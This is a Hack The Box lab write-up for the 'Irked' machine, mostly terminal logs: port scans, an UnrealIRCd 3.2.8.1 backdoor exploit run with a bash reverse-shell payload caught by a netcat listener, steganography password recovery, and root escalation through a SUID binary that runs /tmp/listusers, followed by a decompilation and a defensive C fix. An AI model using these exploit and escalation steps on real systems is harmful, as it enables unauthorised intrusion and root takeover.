irked

Introduction:
Recon
eneloop@kinetic:.../hackthebox/irked/data$ sudo nmap -sS -sC -sV -T4 -O -oN nmap.irked.txt 10.10.10.117
[sudo] password for eneloop:
Sorry, try again.
[sudo] password for eneloop:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 15:56 EST
Nmap scan report for 10.10.10.117
Host is up (0.014s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4      111/tcp     rpcbind
|   100000  2,3,4      111/udp     rpcbind
|   100000  3,4        111/tcp6    rpcbind
|   100000  3,4        111/udp6    rpcbind
|   100024  1          38381/tcp6  status
|   100024  1          47765/tcp   status
|   100024  1          54604/udp6  status
|_  100024  1          55280/udp   status
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/27%OT=22%CT=1%CU=31312%PV=Y%DS=2%DC=I%G=Y%TM=603AB20
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=F2%GCD=2%ISR=111%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.95 seconds

Scanning target 10.10.10.117
Time started: 2021-02-27 15:56:20.017287
Port 111 is open
Port 22 is open
Port 80 is open
Port 6697 is open
Port 8067 is open
Port 47765 is open
Port 65534 is open
Port scan completed in 0:00:07.285612
Apache/2.4.10 (Debian) Server at 10.10.10.117 Port 80
Enumeration
eneloop@kinetic:.../hackthebox/irked/data$ nikto -url http://10.10.10.117
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.117
+ Target Hostname:    10.10.10.117
+ Target Port:        80
+ Start Time:         2021-02-27 15:58:25 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 48, size: 56c2e413aa86b, mtime: gzip
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2021-02-27 16:01:19 (GMT-5) (174 seconds)
eneloop@kinetic:.../hackthebox/irked/data$ nmap -p111,22,80,6697,8067,47765,65534 -sV -sC -T4 -Pn 10.10.10.117
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 16:03 EST
Nmap scan report for 10.10.10.117
Host is up (0.012s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4      111/tcp     rpcbind
|   100000  2,3,4      111/udp     rpcbind
|   100000  3,4        111/tcp6    rpcbind
|   100000  3,4        111/udp6    rpcbind
|   100024  1          38381/tcp6  status
|   100024  1          47765/tcp   status
|   100024  1          54604/udp6  status
|_  100024  1          55280/udp   status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
47765/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.41 seconds
eneloop@kinetic:.../hackthebox/irked/data$ irc enel00p 10.10.10.117
*** Connecting to port 6667 of server 10.10.10.117
*** Unable to connect to port 6667 of server 10.10.10.117: connect: Bad file descriptor
*** Use /SERVER to connect to a server
*** Connecting to port 6697 of server 10.10.10.117
-irked.htb- *** Looking up your hostname...
-irked.htb- *** Couldn't resolve your hostname; using your IP address instead
*** Welcome to the ROXnet IRC Network [email protected] (from irked.htb)
*** If you have not already done so, please read the new user information with /HELP NEWUSER
*** Your host is irked.htb, running version Unreal3.2.8.1
*** This server was created Mon May 14 2018 at 13:12:50 EDT
*** umodes available iowghraAsORTVSxNCWqBzvdHtGp, channel modes available lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
*** UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 +TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
*** WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ +CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT +STATUSMSG=~&@%+ :are supported by this server
*** EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
*** There are 1 users and 0 invisible on 1 servers
*** This server has 1 clients and 0 servers connected
*** Current Local Users: 1  Max: 1
*** Current Global Users: 1  Max: 1
*** MOTD File is missing
*** Mode change "+iwx" for user enel00p by enel00p
*** choices:
*** Channel  Users  Topic
*** Client: ircII 20190117
*** Server irked.htb: Unreal3.2.8.1. FhiXOoE [*=2309]
*** UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 +TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
*** WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ +CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT +STATUSMSG=~&@%+ :are supported by this server
*** EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
[1] 16:15 enel00p (+iw) * type /help for help
Exploitation
https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/blob/master/exploit.py
(py3) eneloop@kinetic:.../hackthebox/irked/data$ python ./exploit.py
usage: exploit.py [-h] -payload {python,netcat,bash} ip port
exploit.py: error: the following arguments are required: ip, port, -payload
(py3) eneloop@kinetic:.../hackthebox/irked/data$ python ./exploit.py -payload bash 10.10.10.117 6697
Exploit sent successfully!

eneloop@kinetic:/oscp/tools$ nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.10.117] 40490
bash: cannot set terminal process group (639): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$

   66  tar cvf - Unreal3.2| gzip >Unreal3.2.tar.gz
   67  history
ircd@irked:~$ ls
ls
Unreal3.2  Unreal3.2.tar.gz
ircd@irked:~$
Post-exploit/PrivEsc
ircd@irked:/home/djmardov$ ls -l ./Documents/user.txt
ls -l ./Documents/user.txt
-rw------- 1 djmardov djmardov 33 May 15  2018 ./Documents/user.txt
ircd@irked:/home/djmardov$ ls -l ./Documents/.backup
ls -l ./Documents/.backup
-rw-r--r-- 1 djmardov djmardov 52 May 16  2018 ./Documents/.backup
ircd@irked:/home/djmardov$ file ./Documents/.backup
file ./Documents/.backup
./Documents/.backup: ASCII text
ircd@irked:/home/djmardov$ cat ./Documents/.backup
cat ./Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
ircd@irked:/home/djmardov$

(py3) eneloop@kinetic:.../hackthebox/irked/data$ wget http://10.10.10.117/irked.jpg
--2021-02-27 17:52:28--  http://10.10.10.117/irked.jpg
Connecting to 10.10.10.117:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34697 (34K) [image/jpeg]
Saving to: 'irked.jpg'

irked.jpg           100%[=======================================================================>]  33.88K  --.-KB/s    in 0.01s

2021-02-27 17:52:28 (2.47 MB/s) - 'irked.jpg' saved [34697/34697]

(py3) eneloop@kinetic:.../hackthebox/irked/data$ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt".
(py3) eneloop@kinetic:.../hackthebox/irked/data$ cat pass.txt
Kab6h+m+bbp2J:HG
(py3) eneloop@kinetic:.../tools/PEAS/linPEAS$ ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$
djmardov@irked:~$ cd Documents/
djmardov@irked:~/Documents$ ls
user.txt
djmardov@irked:~/Documents$ cat user.txt
4aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX8e
djmardov@irked:~/Documents$

djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-02-27 17:15 (:0)
djmardov pts/0        2021-02-27 18:04 (10.10.14.38)
sh: 1: /tmp/listusers: not found

djmardov@irked:~$ vi /tmp/listusers
djmardov@irked:~$ /bin/sudo^C
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-02-27 17:15 (:0)
djmardov pts/0        2021-02-27 18:04 (10.10.14.38)
root@irked:~# cd /root
root@irked:/root# ls
pass.txt  root.txt
root@irked:/root# cat pass.txt
Kab6h+m+bbp2J:HG
root@irked:/root# cat root.txt
8d8XXXXXXXXXXXXXXXXXXXXXXXXXXXf3
root@irked:/root#
From ghidra analysis -
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
int main(void)   /* Ghidra shows the return type as undefined4 */
{
    puts("This application is being devleoped to set and test user permissions");
    puts("It is still being actively developed");
    system("who");
    setuid(0);                  /* the binary runs SUID root, so this makes the real uid root as well */
    system("/tmp/listusers");   /* runs whatever sits at a world-writable path, now as root */
    return 0;
}
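The decompiled viewuser above shows the root cause: a SUID-root program escalates with setuid(0) and then hands a world-writable path to system(). The following is an added example, not code from the box or its author, of how such a helper launcher would vet the helper before running it and use execve() with a fixed environment instead of system(); the enum names, the untrusted-directory list and the 126/127 status convention are this example's own choices.

```c
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Result of vetting a helper program before a privileged process runs it. */
enum helper_status {
    HELPER_OK = 0,
    HELPER_NOT_ABSOLUTE,       /* relative: resolved through the caller's cwd or PATH */
    HELPER_UNTRUSTED_DIR,      /* lives under a directory any local user can write */
    HELPER_STAT_FAILED,        /* missing or inaccessible */
    HELPER_NOT_ROOT_OWNED,     /* the owner could replace it with their own code */
    HELPER_WRITABLE_BY_OTHERS  /* group- or world-writable: same problem */
};

/* World-writable directories (assumed list): a helper run as root must never live here. */
static const char *const untrusted_dirs[] = { "/tmp/", "/var/tmp/", "/dev/shm/", NULL };

enum helper_status check_helper(const char *path)
{
    struct stat st;
    if (path == NULL || path[0] != '/') return HELPER_NOT_ABSOLUTE;
    for (int i = 0; untrusted_dirs[i] != NULL; i++)
        if (strncmp(path, untrusted_dirs[i], strlen(untrusted_dirs[i])) == 0)
            return HELPER_UNTRUSTED_DIR;
    if (stat(path, &st) != 0) return HELPER_STAT_FAILED;
    if (st.st_uid != 0) return HELPER_NOT_ROOT_OWNED;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return HELPER_WRITABLE_BY_OTHERS;
    return HELPER_OK;
}

/* Run a vetted helper with execve() and a fixed environment instead of system(),
 * so the caller's PATH, IFS and shell cannot change what actually executes.
 * Returns the helper's exit status, 126 if vetting failed, 127 if it could not
 * be executed, or -1 on a fork/wait error. */
int run_helper(const char *path)
{
    char *const argv[] = { (char *)path, NULL };
    char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    int status;
    if (check_helper(path) != HELPER_OK) return 126;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execve(path, argv, envp); _exit(127); }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With this check in place, the /tmp/listusers location used by viewuser is refused before any privileged code path is reached, and a helper that later becomes writable by its group or by others is refused as well.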